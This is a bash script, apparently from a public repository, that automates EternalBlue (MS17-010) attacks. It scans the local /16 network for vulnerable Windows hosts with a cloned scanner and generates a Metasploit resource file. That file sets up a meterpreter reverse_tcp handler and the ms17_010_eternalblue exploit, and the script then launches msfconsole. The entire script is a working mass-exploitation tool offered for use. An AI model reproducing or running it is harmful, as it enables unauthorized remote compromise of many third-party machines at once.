#!/usr/bin/env bash

# run as sudo checks
# sudo is necessary for scanning eternalblues and 
# metasploit framework
echo "Special thanks to";
echo " | \ | |/ ____|  /\    ";
echo " |  \| | (___   /  \   ";
echo " | .   |\___ \ / /\ \  ";
echo " | |\  |____) / ____ \ ";
echo " |_| \_|_____/_/    \_\ ";
echo "https://github.com/nsa";
echo "";

if [[ $EUID -ne 0 ]]; then
   echo "This script must be run as root" 1>&2;
   exit 1;
fi

# cloning scanner from the github repo
if [ ! -d "eternal_scanner" ]; then
    git clone https://github.com/peterpt/eternal_scanner.git;
    chmod +x eternal_scanner/escan;
else 
    chmod +x eternal_scanner/escan;
fi

# read necessary infos from the user
read -p 'YOUR IP: ' yourIP;
if [ -z $yourIP ]; then
    echo "YOUR IP parameter cannot be empty"; exit 1;
fi



# parses your ip into ip{1-4}
ip=$yourIP;
ip1=${ip%%.*};
ip=${ip#*.*};
ip2=${ip%%.*};
ip=${ip#*.*};
ip3=${ip%%.*};
ip=${ip#*.*};
ip4=${ip%%.*};

if [ ! -f /usr/local/share/Eternal_Scanner/vuln.txt ]; then
    echo "";
    echo "SCANNER STARTING...";
    echo "";
    cd eternal_scanner 
    ./escan -i $ip1.$ip2.0.0/16
    cd ..
    echo "";
    echo "Parsing IPs...";
    python3 ipparser.py &

else
    echo "No scanner needed due to the file ";
    echo "/usr/local/share/Eternal_Scanner/vuln.txt";
    echo "EXISTS";
    python3 ipparser.py &
    echo "";
    echo "Parsing IPs...";

fi

read -p 'CONNECTION PORT(default: 31313): ' port;
if [ -z $port ]; then
    port="31313";
fi

echo "use exploit/multi/handler" > nsa.rb;
echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> nsa.rb;
echo "set autorunscript multi_console_command -rc nsa.rc" >> nsa.rb
echo "set lhost" $yourIP >> nsa.rb
echo "set lport" $port >> nsa.rb
echo "set ExitOnSession false" >> nsa.rb
echo "exploit -j" >> nsa.rb
echo "use exploit/windows/smb/ms17_010_eternalblue" >> nsa.rb;
echo "set VerifyArch false" >> nsa.rb;

# echo "";
# echo "PLEASE COPY THE TARGET IP";
# echo "";

# read -p 'TARGET IP: ' targetIP;
# if [ -z $targetIP ]; then
#     echo "TARGET IP parameter cannot be empty"; exit 1;
# fi

# # shows the options
# echo "";
# echo "metasploit console starting with options";
# echo ">> use exploit/windows/smb/ms17_010_eternalblue";
# echo ">> set PAYLOAD windows/x64/meterpreter/reverse_tcp";
# echo ">> set LHOST" $yourIP;
# echo ">> set LPORT" $port;
# echo ">> set RHOST" $targetIP;

# if user wants to continue then exploitS
read -p 'Do you want to proceed(y/n): ' check;
if [ "$check" == "y" ] || [ "$check" == "yes" ]; then
    echo "";
    echo "Running please wait..."; 
    # msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST $yourIP;set LPORT $port;set RHOST $targetIP;set VerifyArch false;exploit;"
    msfconsole -r iter.rc
else
    echo "Not Proceeded, USER EXIT"; exit 1;
fi